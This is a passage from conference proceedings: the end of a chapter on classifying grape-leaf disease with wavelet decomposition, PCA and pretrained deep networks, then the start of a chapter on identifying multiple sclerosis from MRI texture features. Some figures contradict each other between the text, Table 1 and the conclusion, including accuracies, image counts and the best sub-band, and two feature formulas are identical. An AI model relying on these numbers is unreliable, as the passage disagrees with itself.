© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 355
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_29

the diseases caused by various pathogens to the plants ruins the yield up to 20–40%.
The grape vines are one of the key founts of the agricultural and vine industries. The
quantity and quality of vines should be up to the mark of the market standards.
The detection of diseases in plants is often miscalculated when manual detection
is used, and hence there is a need for automated systems which can detect the
diseases with the least number of manual interventions [1]. One of the main issues
in disease detection is the similarity in the symptoms of different diseases. It is
very hard to differentiate one disease from another disease [2]. So, the emphasis
should be more on feature extraction part of the system. The significant features
provide high-accurate system. Han and Shi computed the features using HSV, Lab
and YCbCr models which provided 91.3% accuracy with support vector machine
(SVM) and deep convolutional networks (DCNNs) [3]. Linear and quadratic local
binary patterns were used by Veerashetty and Patil for creating a feature vector which
was invariant to the rotation, illumination and scaling changes. The accuracy of 95%
was computed with a multi-kernel SVM classifier [4]. Gayathri Devi and Neelamegam used DWT, SIFT
and GLCM features for detection of diseases in paddy fields of Thanjavur. The system achieved
96.83% classification accuracy with KNN, ANN, NB and Multi SVM [5].
A system with color and grayscale information features was developed by Ghazal
and Mahmoud which used the pre-determined region of interest (ROI) pixels for the
objective of determining the probabilities for the pixels. The labels were fined with
Gauss-Markov random field model. The dice similarity coefficient has provided
the recognition rate of 90% [6]. Xiao and Ma extracted 21 features for the
processing which included the features based on color, texture and morphology.
Principal component analysis (PCA) was utilized for the purpose of reducing the
dimensionality. The classification accuracy was obtained as 95.63% with SVM and
back-propagation neural networks (BPNNs) [7]. The system developed by Ma and
Du used conventional as well as deep learning classifiers. The features extracted
for conventional classifiers were the average, contrast, correlation, energy, etc. from
different channels of different color models. The highest accuracy obtained using
SVM, random forest and AlexNet was 93.4% [8]. Hassanein and Gaber developed
a system for tomato disease detection which extracted the features using Gabor
Transforms and the feature selection process was done using the moth flame opti-
mization and rough set. The accuracy of 90.5% was achieved using KNN and SVM
[9]. Okra and Bitter gourd diseases were detected by Mondal and Kole using an
entropy discretization Method. Correlation coefficient was computed and provided a
recognition rate of 96.78% [10]. Yao and Chen developed a system which employed
the HOG, Gabor and LBP for feature extraction and provided an accuracy of 90.7%
[11]. The textural features LBP, CLBP and LTP were used by Kirti to detect the leaf
scorch disease in the strawberry plant. The comparison among all the three feature
extraction techniques was made on the basis of the accuracy computed by the SVM clas-
sifier. The highest accuracy achieved was 97.60% [12]. Revathi and Hemalatha utilized
the swarm optimization in combination with SVM, BPN and fuzzy logic to detect the
disease in cotton plants which achieved an accuracy of 94% [13]. Zhou and Kaneko
detected foliar disease in Sugar Beet by using three features in combination with

L*a*b* color model and classified the images using SVM and template matching.
The algorithm provided an accuracy of 97.44% [14].
The rest of the paper is organized as follows. The preliminary descrip-
tion, block diagram and the algorithm description for the proposed novel DWT-DNN
technique along with the process of selection of the best decomposition level and
sub-band selection is explained in Sect. 2. Description about the dataset and system
specifications are mentioned in Sect. 3 along with the comparison graphs of perfor-
mance among 2 wavelets for level and sub-band selections are presented. The results
are discussed in the same section. The conclusion is presented in Sect. 4.

2 Research Methodology of Proposed Novel DWT


and Deep Learning Based Feature Extraction Technique
for Plant Disease Identification

In this section, the preliminary description of robust features extraction large scale
based on DWT, PCA based large scale RGB feature extraction and deep learning
based classification technique for plant disease identification is presented.

2.1 Robust Feature Extraction Based on Large Scale DWT


for Colored Images of Plants (Healthy/Diseased) Leaf
Images

The colored images (R, G, B individual channels) of plant leaves were decomposed
up to four levels. The decomposition of the image is proven to be the best
alternative to determine the high-detail features and it also provides scale-invariant
interpretation of the leaf image. Discrete wavelet transform (DWT) is employed
aimed at the investigation of different sub bands that can help in excluding out
the significant distinct features of the leaves efficiently for the disease detection.
Images were broken down into 4 different coefficients, as illustrated in Fig. 1, which
are high frequency and low frequency (in three directions) in nature. The DWT
(dwt (z)) is attained by exploitation of the function (s(z)) which is also called as
the scaling function and the function (w(z)) which represents the wavelet in Eq. 1
at decomposition level d:

dwt(z) = Σ_x l_d(x) 2^(d/2) s(2^d z − x) + Σ_x h_d(x) 2^(d/2) w(2^d z − x)    (1)

In Eq. 1, dwt(z) is decomposed at level which is providing ld (x), i.e., coefficients


that have low frequency and h d (x), i.e., coefficients with high frequency, respectively.

Fig. 1 Illustration of multi-resolution analysis through discrete wavelet transform (DWT)

This decomposition yields various frequency coefficients at different scales of


the image. At level 1, the approximation coefficient (cA) which has low frequency
was computed. Then, the detail coefficients (cH, cV and cD) with high frequency are
computed subsequently. The further decompositions at subsequent levels provide
more significant and discriminating approximation and detail coefficients. These
are of 2 types—the high-scale low frequency Approximation coefficient, i.e., cA
(Approximation) which provides the significant and high information about the leaf
image and the low scale high frequency Detail coefficients, i.e., cH (Horizontal),
cV (Vertical) and cD (Diagonal) [15–17] as shown in Fig. 1. The most important
advantage of separating out these coefficients from the leaf images is that the features
can be segregated out which contribute the most, as cV and cH sub bands are sensitive
to pose variations, respectively, and the large amount of the noise effect is due to cD
sub band. Two wavelets, namely Daubechies and Biorthogonal, were used because they run
faster than other feature extraction techniques and
decompose the image into higher frequency and lower frequency components which
helps in determining more significant features. The approximation coefficient cA of
the first stage was given as input to the next stage DWT and so on.
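A minimal sketch of the per-channel multi-level DWT decomposition described in this subsection, assuming the PyWavelets package and an RGB leaf image stored as an H × W × 3 array; the function name and file name are hypothetical.

```python
import pywt

# Four-level 2D DWT per color channel; cA of each level feeds the next level.
def dwt_channel_features(img, wavelet="db4", levels=4):
    features = {}
    for c, name in enumerate("RGB"):
        cA = img[:, :, c].astype(float)
        for level in range(1, levels + 1):
            cA, (cH, cV, cD) = pywt.dwt2(cA, wavelet)
            features[(name, level)] = {"cA": cA, "cH": cH, "cV": cV, "cD": cD}
    return features

# usage (hypothetical file name):
# img = plt.imread("grape_leaf.jpg"); feats = dwt_channel_features(img)
```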

2.2 Selection of Features in Reduced Sub-Space for Efficient


Feature Vector Formation Using Principal Component
Analysis (PCA)

As discussed above, the dimensionality of colored plant image features was very
high. After performing DWT and selecting large scale coefficients, there was a need
to reduce the feature sub-space, as it has been observed that computational time

of CPU was still very high. The processor was unable to handle a high amount of
processing of large sized dataset features. Therefore, principal component analysis
was utilized for reducing the size of training and test features of image space. The
main concept in the process of determining the PCA consists of the reduction of
dimensionality present in the input dataset which may contain a very high number of
interrelated components, while obtaining significant number of variations existing
in it. The above-mentioned task is done by converting the image into a linear vector of
weights by transforming it into a single-dimensional column vector. The training space
i = [1 . . . I] represents the training images as column vectors IMi=[1...I],
integrated to create a 2D matrix from which the mean m of all image vectors is
subtracted.
The reduction in dimension was done using the concept K × K ≪ N × N, with a covariance
matrix of size K × K as shown in Eq. 2. This space was called the reduced sub-space and
provided the eigenvectors corresponding to the normalized eigenvalues, which were used
to form a projection between the sub-spaces of
the training and testing sets. The classification is performed by pre-trained DNNs.


Cm = Σ_{i=1}^{I} (m − IMi)·(m − IMi)T    (2)
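A hedged sketch of the reduced sub-space PCA described above, which diagonalizes a K × K matrix instead of the N × N image-space covariance; variable and function names are illustrative.

```python
import numpy as np

# images: K x N matrix, one flattened feature vector per row (K << N).
def pca_reduced_subspace(images, n_components):
    mean = images.mean(axis=0)
    A = (images - mean).T                      # N x K matrix of centered vectors
    small_cov = A.T @ A                        # K x K instead of N x N
    eigvals, eigvecs = np.linalg.eigh(small_cov)
    order = np.argsort(eigvals)[::-1][:n_components]
    U = A @ eigvecs[:, order]                  # map back to image space (N x n)
    U /= np.linalg.norm(U, axis=0)             # normalized eigenvectors
    return mean, U

# projection of a new feature vector x: weights = U.T @ (x - mean)
```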

2.3 Significant Feature Vector Formulation


and Classification Based on DNNs

The classification phase is one of the crucial steps in a disease detection
system, since in this phase the system assigns the class labels to the test images and
compute the validation accuracy. The deep neural networks are excellent in handling
the large sized datasets to obtain the significant features and provides better accuracy
and results than other classifiers. These are applied using transfer learning and fine-
tuned for the desired system. It automatically learns the robustness hidden in the
variations of the input dataset. The six types of pre-trained deep neural networks
architectures are utilized to form feature vector formulation and classification, i.e.,
AlexNet, GoogleNet, ResNet-50, ResNet-101, Inception V3 and Xception [18]. The
pre-trained models are selected on the basis of the increment in accuracy and number
of parameters. These architectures were pre-trained on ImageNet database which
contains millions of images of 1000 different classes objects and the class weights
that are trained using the previous problems, used for the system and fine-tuned
according to the problem.
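The experiments in this paper are carried out in MATLAB (Sect. 3.2); the following PyTorch fragment is only an illustrative equivalent of the transfer-learning step, replacing the final layer of an ImageNet-pretrained ResNet-50 for the 4-class grape-leaf problem.

```python
import torch.nn as nn
import torch.optim as optim
from torchvision import models

# Load an ImageNet-pretrained backbone, freeze its features, and attach a new
# 4-class head (healthy + 3 diseases) that is then fine-tuned.
num_classes = 4
model = models.resnet50(weights="IMAGENET1K_V1")
for p in model.parameters():
    p.requires_grad = False                                  # freeze pretrained features
model.fc = nn.Linear(model.fc.in_features, num_classes)      # new classifier head

optimizer = optim.Adam(model.fc.parameters(), lr=1e-3)
criterion = nn.CrossEntropyLoss()
# a standard training loop over (images, labels) batches would follow here
```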

2.4 Proposed Novel DWT and Deep Learning Based


Technique for Identification of Diseases in Plants

The proposed novel technique based on DWT and deep learning designed for extrac-
tion of the features and classification for identification of diseases in plants mentioned
below incorporates multi-resolution analysis of the images, dimensionality reduc-
tion process and the feature vector formulation and classification which can help in
improving the accuracy of the system, illustrated in Fig. 2. The algorithm description
is mentioned as:
1. The RGB images were loaded into the system and passed for the processing.
2. The R, G and B channels were separated out of the image.
3. The images obtained were decomposed up to 4 levels.
4. The multi-resolution analysis of the images was done using 2 wavelets, i.e., db4
and bior 1.5.
5. The dimensionality reduction process was then applied on the computed
coefficients by applying principal component analysis.
6. The R, G and B components were then concatenated to obtain a single RGB
image which was then passed into 6 types of DNNs.
7. Accuracy was computed with each DNN for every sub band and decomposition
level.

Fig. 2 Proposed novel DWT and deep learning based feature extraction technique for plant disease
identification

Fig. 3 Plant village dataset contained grape vine leaves: a healthy, b affected from black rot disease,
c affected from Esca (Black Measles), d affected from leaf blight disease (Isariopsis Leaf Spot)

3 Experiments and Discussions

In this section, the details about the dataset and the system specifications are provided.
The results between the two wavelets for the selection of level and sub-band selection
are discussed.

3.1 Dataset

The grape dataset from plant village database was used for the work [19]. The dataset
contained a total of 1600 RGB/color images that were used, consisted of 400 images
in each class. There were 4 distinct classes. The first class was labeled as the healthy
class and the remaining 3 classes were the ones with the images of diseased leaves.
The 3 diseases affected the grape leaves were black rot disease, Esca (Black Measles)
disease and the leaf blight (Isariopsis Leaf Spot). The images were in .jpeg format
with a resolution of 256 × 256 pixels. The images seemed to be captured with a
monochrome background with no complexities as demonstrated in Fig. 3.

3.2 System Specifications

A system with 8 GB RAM, 2 GHz clock speed, 64-bit Intel core i7 was used for the
experiments. The processing is done with MatLab 2020 installed with the system.
The 2 types of experiments are done on the basis of wavelets.

3.3 DWT Sub Band Selection and Level of Decomposition


Selection with Daubechies Wavelet (db4)
and Biorthogonal (Bior1.5) Wavelet with DNNs

The images obtained from the concatenation of all the components (R, G, B) were
then passed to the next stage where the DNNs are applied to do the further processing.
Accuracy was computed for different decomposition levels with different sub bands
and DNNs. The highest accuracy achieved by db4 with level 1 decomposition was
with the Inception V3 DNN at the cH sub band, i.e., 98.96%, with level 2 decom-
position was with the ResNet 101 DNN at the cA sub band, i.e., 98.13%, with level
3 decomposition was with the Inception V3 DNN at the cA sub band, i.e., 97.92%,
with level 4 decomposition was with the ResNet 50 & ResNet 101 DNN at the cA
sub band, i.e., 97.08%.
The second wavelet used in multi-resolution analysis was the biorthogonal
wavelet. The version bior 1.5 was applied on the images and further decomposi-
tion levels. The highest accuracy achieved with level 1 decomposition was with the
Inception V3 DNN at the cA and cD sub band, i.e., 98.96%, with level 2 decompo-
sition was with the ResNet 101 DNN at the cV sub band, i.e., 98.54%, with level
3 decomposition is with the Inception V3 DNN at the cD sub band, i.e., 98.54%,
with level 4 decomposition was with the Inception V3 DNN at the cV sub band, i.e.,
97.29%.
The system with db4 wavelet provided the highest accuracy of 98.96% when
compared with every sub band with each decomposition level. The cH sub band and
the decomposition level 1 was found to have the most significant features which can
provide the highest accuracy. The system with bior 1.5 wavelet provided the highest
accuracy of 98.96% when compared with every sub band with each decomposition
level. The cD sub band and the decomposition level 1 was found to have the most
significant features which can provide the highest accuracy, as shown in Fig. 4.

3.4 Comparison of Accuracy Among the 2 Wavelets


with Respect of Levels and Sub Bands

The comparison of accuracy between the wavelets db4 and bior 1.5 was made to
determine the best decomposition level and sub bands.
It had been found that the Level 1 decomposition was proven to be the best
decomposition level where the system provided the best accuracy of 98.96%, as
shown in Fig. 5. The other comparison was done between db4 and bior 1.5 wavelets
to determine the best sub band. It had been found that the cA sub band was proven
to be the best decomposition level where the system provided the best accuracy of
98.80%. The wavelet db4 was determined to be the best for the particular system as
it provided the highest accuracy among both the wavelets, i.e., 98.96%.

Fig. 4 Comparison of accuracy among sub band and level with a db4 wavelet, b bior1.5 wavelet

Fig. 5 Performance comparison between db4 wavelet and bior1.5 wavelet for a sub-band selection
and, b decomposition level selection

Table 1 Accuracy comparison of performance among the current approaches and proposed approach

Approaches                            Accuracy (%)
Ghazal and Mahmoud et al. [6]         90
Hassanein and Gaber et al. [9]        90.5
Yao and Chen et al. [11]              90.7
Han and Shi et al. [3]                91.3
Ma and Du et al. [8]                  93.4
Veerashetty and Patil et al. [4]      95
Xiao and Ma et al. [7]                95.83
Mondal and Kole et al. [10]           96.78
Gayathri Devi et al. [5]              98.63
DWT-DNN (Proposed approach)           98.96

3.5 Comparison of Accuracy with State-of-Art Approaches


with Proposed Approach

The comparison between different approaches was made on the basis of the highest
accuracy achieved as shown in Table 1. The colored images were used in the proposed
approach while the other approaches converted the images into gray-scale images
for easy computation. The other approaches used the only available resolution of
the images, but the proposed approach used the multi-resolution analysis to deter-
mine the best level at which the least memory was required by the system to process
the images. The system performed well with no high-end GPU installed in it. The
other approaches used the SVM, KNN, decision trees and other classification tech-
niques which proved to be lesser accurate in comparison with the proposed approach
classification techniques, i.e., DNNs.
It was observed that the proposed approach produced the highest accuracy among
the existing approaches, i.e., 98.96% as demonstrated in Fig. 6.

4 Conclusion

The proposed technique is a novel feature extraction technique which is based on


DWT and deep learning for identification of diseases in plants which was performed
on the 400 images of Grape dataset of Plant village database. The feature extraction
was accomplished using multi-resolution analysis of the images using DWT with
two different orthogonal wavelets namely db4 and bior1.5. The sub-band selection
and decomposition level selection had been made to determine the best parameters
for the better accuracy. The computed parameters were then passed for dimensional
reduction using PCA. The robust features were computed using PCA, and the training
images were passed to different DNNs. The highest accuracy was achieved by Incep-
tion V3 in majority of the cases. The sub band cA and decomposition level 1 were best

Fig. 6 Performance comparison between different approaches

suited for the system. The db4 wavelet performed better than the bior 1.5 wavelet.
The accuracy achieved by the system was 98.96%. The system handled large dataset
very efficiently, whereas the existing Machine learning techniques could not perform
well with large datasets. In future, different families of wavelets will be explored and
examined using different datasets for plant disease identification.

References

1. Giraddi, S., Desai, S., & Deshpande, A. (2020). Deep learning for agricultural plant disease
detection. In lecture notes in electrical engineering (pp 864–871). Springer.
2. Bisen, D. (2020). Deep convolutional neural network based plant species recognition through
features of leaf. Multimed Tools Applications 1–14. https://doi.org/10.1007/s11042-020-100
38-w.
3. Han, J., Shi, L., Yang, Q., et al. (2020). Real-time detection of rice phenology through convo-
lutional neural network using handheld camera images. Precision Agriculture. https://doi.org/
10.1007/s11119-020-09734-2
4. Veerashetty, S., & Patil, N. B. (2020). Novel LBP based texture descriptor for rotation, illumina-
tion and scale invariance for image texture analysis and classification using multi-kernel SVM.
Multimed Tools Applications, 79, 9935–9955. https://doi.org/10.1007/s11042-019-7345-6
5. Gayathri Devi, T., & Neelamegam, P. (2019). Image processing based rice plant leaves diseases
in Thanjavur, Tamilnadu. Cluster Computing, 22, 13415–13428. https://doi.org/10.1007/s10
586-018-1949-x
6. Ghazal, M., Mahmoud, A., Shalaby, A., El-Baz, A. (2019). Automated framework for accu-
rate segmentation of leaf images for plant health assessment. Environmental Monitoring and
Assessment, 191. https://doi.org/10.1007/s10661-019-7615-9
7. Xiao, M., Ma, Y., Feng, Z., et al. (2018). Rice blast recognition based on principal component
analysis and neural network. Computers and Electronics in Agriculture, 154, 482–490. https://
doi.org/10.1016/j.compag.2018.08.028

8. Ma, J., Du, K., Zheng, F., et al. (2018). A recognition method for cucumber diseases using leaf
symptom images based on deep convolutional neural network. Computers and Electronics in
Agriculture, 154, 18–24. https://doi.org/10.1016/j.compag.2018.08.048
9. Hassanien, A. E., Gaber, T., Mokhtar, U., & Hefny, H. (2017). An improved moth flame
optimization algorithm based on rough sets for tomato diseases detection. Computers and
Electronics in Agriculture, 136, 86–96. https://doi.org/10.1016/j.compag.2017.02.026
10. Mondal, D., Kole, D. K., & Roy, K. (2017). Gradation of yellow mosaic virus disease of okra
and bitter gourd based on entropy based binning and Naive Bayes classifier after identification
of leaves. Computers and Electronics in Agriculture, 142, 485–493. https://doi.org/10.1016/j.
compag.2017.11.024
11. Yao, Q., Chen. G. te, Wang, Z., et al. (2017). Automated detection and identification of white-
backed planthoppers in paddy fields using image processing. Journal of Integrative Agriculture,
16, 1547–1557. https://doi.org/10.1016/S2095-3119(16)61497-1
12. Kirti, Rajpal, N., & Arora, M. (2021). Comparison of texture based feature extraction tech-
niques for detecting leaf scorch in strawberry plant (Fragaria × Ananassa). In A. Kumar, S.
Mozar (Eds.), Lecture notes in electrical engineering. ICCCE 2020. Lecture Notes in Electrical
Engineering (Vol. 698, pp 659–670). Springer.
13. Revathi, P., & Hemalatha, M. (2014). Cotton leaf spot diseases detection utilizing feature
selection with skew divergence method. International Journal of Science, Engineering and
Technology, 3, 22–30.
14. Zhou, R., Kaneko, S., Tanaka, F., et al. (2015). Image-based field monitoring of Cercospora
leaf spot in sugar beet by robust template matching and pattern recognition. Computers and
Electronics in Agriculture, 116, 65–79. https://doi.org/10.1016/j.compag.2015.05.020
15. Yadav, J., Rajpal, N., & Mehta, R. (2018). A new illumination normalization framework via
homomorphic filtering and reflectance ratio in DWT domain for face recognition. Journal of
Intelligent & Fuzzy Systems, 35, 5265–5277. https://doi.org/10.3233/JIFS-169810
16. Yadav, J., Rajpal, N., & Vishwakarma, V. (2016) Face recognition using Symlet, PCA and
Cosine angle distance measure. In 2016 Ninth International Conference on Contemporary
Computing (IC3), Noida, U.P.
17. Yadav, J., Rajpal, N., & Mehta. R. (2019). An improved illumination normalization and robust
feature extraction technique for face recognition under varying illuminations. Arabian Journal
for Science and Engineering, 44, 9067–9086.
18. Lumini, A., & Nanni, L. (2019). Deep learning and transfer learning features for plankton
classification. Ecological Informatics, 51, 33–43. https://doi.org/10.1016/j.ecoinf.2019.02.007
19. GitHub—spMohanty/PlantVillage-Dataset: Dataset of diseased plant leaf images and corre-
sponding labels. https://github.com/spMohanty/PlantVillage-Dataset. Accessed 11 December
2020
Supervised and Unsupervised Machine
Learning Techniques for Multiple
Sclerosis Identification: A Performance
Comparative Analysis

Shikha Jain, Navin Rajpal, and Jyotsna Yadav

Abstract The identification of multiple sclerosis disease (MSD) is very crucial


because it is a neurological disease in young people where an early detection is recom-
mended. Accurate classification and segmentation using distinct machine learning
techniques plays significant role in identifying MSD based on brain magnetic reso-
nance (MR) images. In this work, a performance comparative analysis of various
supervised and unsupervised machine learning techniques on eighteen gray level
textural feature matrix (GLTFM) of brain MR images has been performed. Super-
vised machine learning (k-nearest neighbor, support vector machine and ensemble
learning) classification techniques are utilized for MSD identification and compared
with unsupervised machine learning-based clustering techniques (k-mean clustering
and Gaussian mixture model). Accuracy has been evaluated for measuring proposed
system’s execution on unhealthy brain magnetic resonance (MR) images from the
e-health dataset and healthy control brain magnetic resonance (MR) images from
private clinical dataset. These metrics are also compared with various state-of-
the-art techniques. It has been verified that MSD identification from healthy and
unhealthy brain MR images based on the proposed methodology using supervised
machine learning techniques yields accuracy of 96.55% which is better than existing
state-of-the-art techniques and unsupervised machine learning techniques.

Keywords Gray level textural feature matrix (GLTFM) · Magnetic resonance


imaging (MRI) · Multiple sclerosis disease (MSD) · Supervised machine learning
techniques · Unsupervised

S. Jain · N. Rajpal · J. Yadav (B)


University School of Information, Communication and Technology, Guru Gobind Singh
Indraprastha University, Delhi, India
e-mail: jyotsnayadav@ipu.ac.in
S. Jain
e-mail: shikha.15316490019@ipu.ac.in
N. Rajpal
e-mail: navin.rajpal@ipu.ac.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 369
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_30

1 Introduction

Multiple sclerosis is a demyelinating illness in which the immune system of the body
is severely affected: the body's own antibodies attack the nerves and cause a communica-
tion breakdown between the brain and other parts of the body. Eventually, the disorder
causes lifelong damage or worsening of the nerves. Multiple sclerosis indications
include pain, fatigue and lack of coordination between the brain and other parts of the
body. Various researchers are working in the domain of MSD identification, segmen-
tation as well as classification of MS lesion in brain MR image. Machine learning
performance is good in identification and segmentation task of brain MR images to
find neurological diseases like a tumor, MSD, Alzheimer’s disease, etc.
In 2018, a GLCM-based classification of brain MR image using feed-forward
neural network has been proposed with 10 folds cross-validation with an accuracy
of 92.75% [1]. Using Adaboost with random forest-based classification on different
datasets using two-dimensional discrete wavelet transform for feature extraction and
probabilistic principal component analysis (PPCA) for dimensionality reduction has
been suggested by [2]. In 2009, Haar wavelet transform along with PCA has been
proposed by [3]. A multilayer perceptron along with modified Jaya algorithm has
been proposed by [4]. In 2016, KPCA (kernel PCA) with bioorthogonal wavelet along
with logistic regression has been proposed by [5]. In 2018, a convolution neural
network with dropout approach was given by [6]. MS patient characterization using
support vector machine with an accuracy of 89.2% was given by Zurita et al. [7].
A threshold-based approach for the segmentation task of multiple sclerosis brain
magnetic resonance image was given by Valcarcel et al. [8]. An automated technique
for the identification and segmentation of MS lesion has been given by Roy et al.
[9]. Different approach for the identification and segmentation of MS lesion and the
classification of healthy brain MR image from unhealthy brain has been given by
[10]. The above literature highlights the fact that different machine learning tech-
niques have been utilized successfully for MSD identification on brain MR images.
However, in order to compare and analyze performance of various supervised and
unsupervised machine learning techniques for MSD identification, a reinvestigation
has been carried out using distinct performance metrics on brain MR images. The
key points in this work are mentioned as:
1. Eighteen textural features are utilized on brain MR image for generating feature
vector and fed to KNN, SVM, ensemble-based classifier and K-mean, Gaussian
mixture model (GMM)-based clustering model.
2. The results of three classifiers and two clustering techniques on different param-
eters for MSD identification has been tested to find the best accuracy on e-health
dataset [11–15] and private clinical dataset [16].
3. Observed results are examined and matched with other techniques.
The paper is organized as follows. Section 2 gives a thorough explanation of the given
approach, and brief overview of techniques has been addressed. Section 3 gives the
experimental results, and Sect. 4 presents the conclusion.

2 Proposed Approach

This methodology consists of three stages, as shown in Fig. 1. First, preprocessing of


healthy and non-healthy (person suffering from multiple sclerosis disease) brain
MR image has been done to boost the image quality. The dataset consists of 192
images in which 110 are healthy images and 82 are non-healthy images. 85% images
are taken into training dataset and 15% images into testing dataset. Second step
is feature extraction in which eighteen features retrieved using gray level textural
feature matrix. Third step is classification of unhealthy image from healthy images
using supervised and unsupervised classifiers (supervised-KNN, SVM, ensemble,
unsupervised k-mean clustering, Gaussian mixture model). Performance has been
analyzed based on various factors of each classifier, and it has been verified that
supervised approach SVM on polynomial kernel function gives the highest accuracy.

2.1 Image Preprocessing

Firstly, the skull part of brain magnetic resonance images in both the training and
test dataset has been extracted using adobe illustrator software. All the images in the
training and test dataset have been resized into 64 × 64 using bilinear interpolation.
In the next step, all the images has been converted into grayscale. Contrast-limited
adaptive histogram equalization method is utilized for improvement of contrast in
training and test dataset images. Afterwards, gamma correction has been used to
control the brightness of the image.
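A minimal sketch of this preprocessing chain, assuming scikit-image and an illustrative gamma value (the paper does not state the gamma used):

```python
from skimage import color, exposure, transform

# Resize to 64x64 (bilinear), convert to grayscale, apply CLAHE, then gamma.
def preprocess(mri_rgb, gamma=0.8):
    img = transform.resize(mri_rgb, (64, 64), order=1)   # bilinear interpolation
    if img.ndim == 3:
        img = color.rgb2gray(img)
    img = exposure.equalize_adapthist(img)                # contrast-limited AHE
    img = exposure.adjust_gamma(img, gamma)               # brightness control
    return img
```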

Fig. 1 Block diagram of multiple sclerosis identification based on gray level textural feature matrix
(GLTFM) using supervised and unsupervised machine learning techniques

2.2 Feature Extraction Through Gray Level Textural Feature Matrix (GLTFM)

The gray level textural feature matrix computes second-order textural features of an
image. First, a co-occurrence matrix is built from the input image, and then normal-
ization of the co-occurrence matrix is computed to obtain eighteen textural features.
The co-occurrence matrix (CM) depicts how often pairs of gray levels occur together
in the image matrix. A symmetric matrix is formed by adding the CM to
its transpose. Then, the normalized matrix is computed by dividing every element of
the symmetric matrix by the sum of all the elements of the symmetric matrix. x(i, j) is the value
of the ith row and jth column in the normalized co-occurrence matrix. N_g is the number of distinct gray
values in the image matrix. μ is the mean and σ is the standard deviation computed from the normal-
ized matrix. i, j refer to normalized matrix values, whereas y, z refer to textural
feature matrix values. The eighteen textural features are listed in Table 1.
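The sketch below illustrates this computation with scikit-image (graycomatrix/graycoprops, available in scikit-image ≥ 0.19); it covers a representative subset of the eighteen features, since the remaining sum- and difference-based statistics follow the same pattern from the normalized matrix. The single distance/angle choice is an assumption not specified in the text, and the input is expected to be an 8-bit grayscale image (e.g., the output of the preprocessing sketch above).

```python
import numpy as np
from skimage.feature import graycomatrix, graycoprops

def gltfm_features(img):
    """Second-order textural features from a normalized gray level co-occurrence matrix."""
    # symmetric=True adds the transpose; normed=True divides by the sum of all elements.
    glcm = graycomatrix(img, distances=[1], angles=[0], levels=256,
                        symmetric=True, normed=True)
    p = glcm[:, :, 0, 0]                                   # normalized matrix x(i, j)
    feats = {name: float(graycoprops(glcm, name)[0, 0])
             for name in ('contrast', 'dissimilarity', 'homogeneity',
                          'energy', 'correlation', 'ASM')}
    nz = p[p > 0]
    feats['entropy'] = float(-np.sum(nz * np.log(nz)))     # ENT
    feats['max_probability'] = float(p.max())              # MAXPROB
    i, j = np.indices(p.shape)
    feats['autocorrelation'] = float(np.sum(i * j * p))    # AUTOCORR
    return feats
```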

2.3 Classification

To classify unhealthy (MS brain MRI) images from healthy (normal brain MRI) images,
five different classification techniques have been used for comparing the results of
MSD identification, as discussed in the forthcoming sections.

Supervised Machine Learning Approach


KNN (K-Nearest Neighbor). K-nearest neighbor classification [17] assigns a test data point
to the class of its nearest neighbor among the two classes (healthy/unhealthy). Distance
measures have been used to find the separation between the feature vectors of the test set brain
MR images and the known brain MR images (training MR images). In this study, we have utilized the cosine distance as
well as the Euclidean distance. Let m and n be feature vectors of length p; then the
Euclidean distance (1) and cosine distance (2) can be computed as:

$$D_{\text{euclidean}} = \sqrt{\sum_{i=1}^{p} (m_i - n_i)^2} \quad (1)$$

$$D_{\text{cosine}} = 1 - \cos(m, n) = 1 - \frac{\sum_{i=1}^{p} m_i n_i}{\sqrt{\sum_{i=1}^{p} m_i^2}\,\sqrt{\sum_{i=1}^{p} n_i^2}} \quad (2)$$

The minimum distance has been used to calculate the nearest neighbor of a test
brain magnetic resonance image.
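A hedged sketch of this 1-NN comparison with scikit-learn is shown below; the feature matrix here is a synthetic placeholder standing in for the eighteen GLTFM features, and the 85/15 split mirrors the protocol described later in Sect. 3.

```python
import numpy as np
from sklearn.neighbors import KNeighborsClassifier
from sklearn.model_selection import train_test_split

rng = np.random.default_rng(0)
X = rng.random((192, 18))                                  # 192 images x 18 textural features (synthetic)
y = np.concatenate([np.zeros(110), np.ones(82)])           # 0 = healthy, 1 = MS

X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.15, stratify=y, random_state=0)      # 85% train / 15% test

knn_euc = KNeighborsClassifier(n_neighbors=1, metric='euclidean').fit(X_train, y_train)
knn_cos = KNeighborsClassifier(n_neighbors=1, metric='cosine').fit(X_train, y_train)
print('Euclidean accuracy:', knn_euc.score(X_test, y_test))
print('Cosine accuracy   :', knn_cos.score(X_test, y_test))
```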
SVM (Support Vector Machine). SVM analyzes data to identify patterns and is then used
for classification problems. The classification problem can be restricted to examination
of the two-class problem.
Table 1 Eighteen gray level textural features of brain magnetic resonance image

Entropy (ENT) = $-\sum_{i,j} x(i,j)\log(x(i,j))$. It is the mathematical changeability that describes the texture of the image.
Energy (ENE) = $\sum_{i,j} x(i,j)^2$. It is the rate of change in the magnitude of the pixel values over nearby areas.
Homogeneity (HOM) = $\sum_{i,j} \frac{x(i,j)}{1+(i-j)^2}$. It measures the proximity of the distribution of elements in the matrix to the diagonal elements.
Contrast (CONT) = $\sum_{i,j} |i-j|^2\, x(i,j)$. It gives the gray level contrast between a pixel and its neighboring pixel value over the entire image.
Correlation (CORR) = $\sum_{i,j} \frac{(i-\mu_i)(j-\mu_j)\,x(i,j)}{\sigma_i \sigma_j}$. It gives a measure of how correlated a gray level value is to its neighboring pixel value over the entire image.
Sum of square variance (SSV) = $\sum_{i,j} (i-\mu)^2\, x(i,j)$. It computes the dissipation with respect to the mean of the gray level distribution.
Inverse difference moment (IDM) = $\sum_{i,j} \frac{x(i,j)}{1+(i-j)^2}$. It is a measure of local homogeneity.
Angular second moment (ASM) = $\sum_{i,j} \{x(i,j)\}^2$. It is a measure of the textural uniformity of an image.
Sum average (SUMA) = $\sum_{i=2}^{2N_g} i\, x_{y+z}(i)$. It is the average sum of all the features.
Sum entropy (SENT) = $\sum_{i=2}^{2N_g} x_{y+z}(i)\log\{x_{y+z}(i)\}$. It is the total amount of the entropies of all the features.
Sum variance (SUMV) = $\sum_{i=2}^{2N_g} (i-\mathrm{SENT})^2\, x_{y+z}(i)$. It is the sum of the variances of all the features.
